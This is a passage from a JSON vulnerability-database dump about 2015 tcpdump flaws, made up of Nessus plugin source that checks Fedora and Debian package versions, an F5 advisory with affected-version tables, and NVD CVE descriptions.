4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153999.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75b00466\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"tcpdump-4.7.3-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "title": "Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:24:17"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "ebdf7e83bd7bce5ac84476b2fe2e176c"}, {"key": "cvelist", "hash": "0cd6bae46b6c121e3245ba39dbe92ae7"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "f148087e200cde7d00dbdeeb0b74cf51"}, {"key": "href", "hash": "4734fd35f6702a811bc9c2931dc22d6c"}, {"key": "modified", "hash": "9a00910eeedb8c835c4637a953896665"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "1717dc64ce58819ecb43043c920ac1e0"}, {"key": "published", "hash": "281278142c1d4f94e3e5900b417d6b70"}, {"key": "references", "hash": "c132aa5866a601b1193cd8b0c108aeb2"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "3bf9f335cf7133ec3558c5981a7a5c4b"}, {"key": "title", "hash": "da24fa604e71295d422585026996451c"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "ea184d6b721d2d67c33ba86e8b4bdead9590dc5a454fdb3e4c1588edd4e55104", "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "f5", "idList": ["SOL16837", "F5:K16837"]}, {"type": "cve", "idList": ["CVE-2015-2154", "CVE-2015-2153", "CVE-2015-0261"]}, {"type": "nessus", "idList": ["FEDORA_2015-4953.NASL", "DEBIAN_DSA-3193.NASL", "OPENSUSE-2015-267.NASL", "GENTOO_GLSA-201510-04.NASL", "FEDORA_2015-4939.NASL", "MANDRIVA_MDVSA-2015-182.NASL", "UBUNTU_USN-2580-1.NASL", "ALA_ALAS-2015-557.NASL", "DEBIAN_DLA-174.NASL", "SUSE_11_TCPDUMP-150320.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310869600", "OPENVAS:1361412562310121417", "OPENVAS:703193", "OPENVAS:1361412562310703193", "OPENVAS:1361412562310842179", "OPENVAS:1361412562310120040", "OPENVAS:1361412562310869148", "OPENVAS:1361412562310869254", "OPENVAS:1361412562310871861"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31791", "SECURITYVULNS:VULN:14315"]}, {"type": "kaspersky", "idList": ["KLA10498"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3193-1:51CD5", "DEBIAN:DLA-174-1:F5DF3"]}, {"type": "ubuntu", "idList": ["USN-2580-1"]}, {"type": "gentoo", "idList": ["GLSA-201510-04"]}, {"type": "amazon", "idList": ["ALAS-2015-557"]}, {"type": "archlinux", "idList": ["ASA-201503-20"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132762"]}, {"type": "zdt", "idList": ["1337DAY-ID-23903"]}, {"type": "exploitdb", "idList": ["EDB-ID:37663"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-1871"]}, {"type": "redhat", "idList": ["RHSA-2017:1871"]}, {"type": "centos", "idList": ["CESA-2017:1871"]}], "modified": "2019-01-16T20:21:13"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4804.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82556);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\");\n script_bugtraq_id(73017, 73018, 73019);\n script_xref(name:\"FEDORA\", value:\"2015-4804\");\n\n script_name(english:\"Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153999.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75b00466\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"tcpdump-4.7.3-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "82556", "cpe": ["p-cpe:/a:fedoraproject:fedora:tcpdump", "cpe:/o:fedoraproject:fedora:22"]}
{"f5": [{"lastseen": "2016-09-26T17:22:51", "bulletinFamily": "software", "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for Traffix SDC, you can use the **tshark** utility instead of the **tcpdump** utility.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n", "modified": "2015-07-02T00:00:00", "published": "2015-07-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/800/sol16837.html", "id": "SOL16837", "title": "SOL16837 - tcpdump before 4.7.2 vulnerabilities CVE-2015-0261, CVE-2015-0261, CVE-2015-2153, CVE-2015-2154, CVE-2015-2155", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-12T02:11:10", "bulletinFamily": "software", "description": "Description \n\n\n * [CVE-2015-0261](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0261>) \n \nInteger signedness error in the mobility_opt_print function in the IPv6 mobility printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) or possibly execute arbitrary code via a negative length value. \n\n * [CVE-2015-2153](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2153>) \n \nThe rpki_rtr_pdu_print function in print-rpki-rtr.c in the TCP printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read or write and crash) via a crafted header length in an RPKI-RTR Protocol Data Unit (PDU). \n\n * [CVE-2015-2154](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2154>) \n \nThe osi_print_cksum function in print-isoclns.c in the ethernet printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted (1) length, (2) offset, or (3) base pointer checksum value. \n\n * [CVE-2015-2155](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2155>) \n \nThe force printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unspecified vectors.\n\nImpact \n\n\nA malformed packet may cause **tcpdump** to fail or execute arbitrary code.\n\n**Note:** The **tcpdump** utility is in use only when debugging network issues. In normal operational mode, **tcpdump** is not running. For this vulnerability to be relevant, an attacker must send specially crafted traffic at the same time an administrative user is capturing traffic one of the internal nodes of a cluster that has access to an external network in the mobile operator's network. The chance of this scenario is almost null. \n\n\nStatus\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None \n| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | None | 11.4.0 - 11.6.0 | Not vulnerable | None \nBIG-IP AFM | None | 11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP Analytics | None | 11.0.0 - 11.6.0 | Not vulnerable | None \nBIG-IP APM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Edge Gateway \n| None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None \n| 6.0.0 - 6.4.0 \n| Not vulnerable | None \n \nEnterprise Manager | None \n| 3.0.0 - 3.1.1 | Not vulnerable | None \nFirePass | None \n| 7.0.0 \n6.0.0 - 6.1.0 \n| Not vulnerable | None \n \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nLineRate | None \n| 2.4.0 - 2.6.0 \n| Not vulnerable | None \n \nF5 WebSafe | None \n| 1.0.0 \n| Not vulnerable | None \n \nTraffix SDC | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | None \n| Low \n| tcpdump \n \n \nRecommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for Traffix SDC, you can use the **tshark** utility instead of the **tcpdump** utility.\n\nSupplemental Information\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x)](<https://support.f5.com/csp/article/K13123>)\n", "modified": "2016-01-09T02:23:00", "published": "2015-07-03T00:33:00", "id": "F5:K16837", "href": "https://support.f5.com/csp/article/K16837", "title": "tcpdump before 4.7.2 vulnerabilities CVE-2015-0261, CVE-2015-0261, CVE-2015-2153, CVE-2015-2154, CVE-2015-2155", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2018-10-10T11:05:49", "bulletinFamily": "NVD", "description": "The osi_print_cksum function in print-isoclns.c in the ethernet printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted (1) length, (2) offset, or (3) base pointer checksum value.", "modified": "2018-10-09T15:56:06", "published": "2015-03-24T13:59:07", "id": "CVE-2015-2154", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2154", "title": "CVE-2015-2154", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:49", "bulletinFamily": "NVD", "description": "The rpki_rtr_pdu_print function in print-rpki-rtr.c in the TCP printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read or write and crash) via a crafted header length in an RPKI-RTR Protocol Data Unit (PDU).", "modified": "2018-10-09T15:56:04", "published": "2015-03-24T13:59:06", "id": "CVE-2015-2153", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2153", "title": "CVE-2015-2153", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:48", "bulletinFamily": "NVD", "description": "Integer signedness error in the mobility_opt_print function in the IPv6 mobility printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) or possibly execute arbitrary code via a negative length value.", "modified": "2018-10-09T15:55:36", "published": "2015-03-24T13:59:02", "id": "CVE-2015-0261", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0261", "title": "CVE-2015-0261", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-01-16T20:21:20", "bulletinFamily": "scanner", "description": "Contains security fix for CVE-2015-0261, CVE-2015-2154, CVE-2015-2153,\nCVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2015-10-19T00:00:00", "published": "2015-04-20T00:00:00", "id": "FEDORA_2015-4953.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82870", "title": "Fedora 20 : tcpdump-4.5.1-4.fc20 (2015-4953)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4953.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82870);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:14:51 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\");\n script_xref(name:\"FEDORA\", value:\"2015-4953\");\n\n script_name(english:\"Fedora 20 : tcpdump-4.5.1-4.fc20 (2015-4953)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Contains security fix for CVE-2015-0261, CVE-2015-2154, CVE-2015-2153,\nCVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-April/154808.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4b228f8f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"tcpdump-4.5.1-4.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:02", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in tcpdump, a\ncommand-line network traffic analyzer. These vulnerabilities might\nresult in denial of service (application crash) or, potentially,\nexecution of arbitrary code.", "modified": "2018-11-10T00:00:00", "published": "2015-03-18T00:00:00", "id": "DEBIAN_DSA-3193.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81899", "title": "Debian DSA-3193-1 : tcpdump - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3193. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81899);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/10 11:49:37\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_xref(name:\"DSA\", value:\"3193\");\n\n script_name(english:\"Debian DSA-3193-1 : tcpdump - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in tcpdump, a\ncommand-line network traffic analyzer. These vulnerabilities might\nresult in denial of service (application crash) or, potentially,\nexecution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/tcpdump\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3193\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the tcpdump packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 4.3.0-1+deb7u2.\n\nFor the upcoming stable distribution (jessie), these problems have\nbeen fixed in version 4.6.2-4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"tcpdump\", reference:\"4.3.0-1+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:11", "bulletinFamily": "scanner", "description": "tcpdump was updated to fix five vulnerabilities in protocol printers\n\nWhen running tcpdump, a remote unauthenticated user could have crashed\nthe application or, potentially, execute arbitrary code by injecting\ncrafted packages into the network.\n\nThe following vulnerabilities were fixed :\n\n - IPv6 mobility printer remote DoS (CVE-2015-0261,\n bnc#922220)\n\n - PPP printer remote DoS (CVE-2014-9140, bnc#923142)\n\n - force printer remote 